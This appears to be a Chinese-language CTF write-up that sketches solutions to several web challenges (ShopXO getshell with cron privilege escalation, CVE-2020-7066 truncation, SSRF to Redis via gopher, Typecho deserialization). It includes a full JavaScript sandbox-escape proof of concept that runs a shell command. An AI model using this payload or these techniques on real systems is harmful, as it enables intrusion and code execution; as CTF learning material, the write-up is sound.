难度一般般,打得很差,自闭了,我菜,我爬

CheckIN

uaf或者putenv+mail都可

老八小超市儿

搜到一个关于shopxo 后台getshell得方法 默认密码登陆getshell flag在/root
权限不够,有一个以root权限运行定时任务,修改定时任务执行的py脚本

cve版签到

cve-2020-7066 getheaders的%00截断

EZ三剑客-EzWeb

给了个内网地址,太菜了,想歪了
ssrf内网探测 c段 找到有redis服务的内网服务器,gopher写shell

EZ三剑客-EzNode

给了一个safeeval库,之前从114师傅那学到一手,这种不认识的库,在vuln搜一下,果然找到了rce的poc 膜114

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
function () {
const f = Buffer.prototype.write;
const ft = {
length: 10,
utf8Write(){

}
};
function r(i){
var x = 0;
try{
x = r(i);
}catch(e){}
if(typeof(x)!=='number')
return x;
if(x!==i)
return x+1;
try{
f.call(ft);
}catch(e){
return e;
}
return null;
}
var i=1;
while(1){
try{
i=r(i).constructor.constructor("return process")();
break;
}catch(x){
i++;
}
}
return i.mainModule.require("child_process").execSync("cat /flag").toString()
}()

EZ三剑客-EzTypecho

之前mrctf有过这个,今天审这个我都没往反序列化那想,被自己菜哭了
附p3师傅rce链子 https://p3rh4ps.top/index.php/2020/04/05/typecho1-1-rce/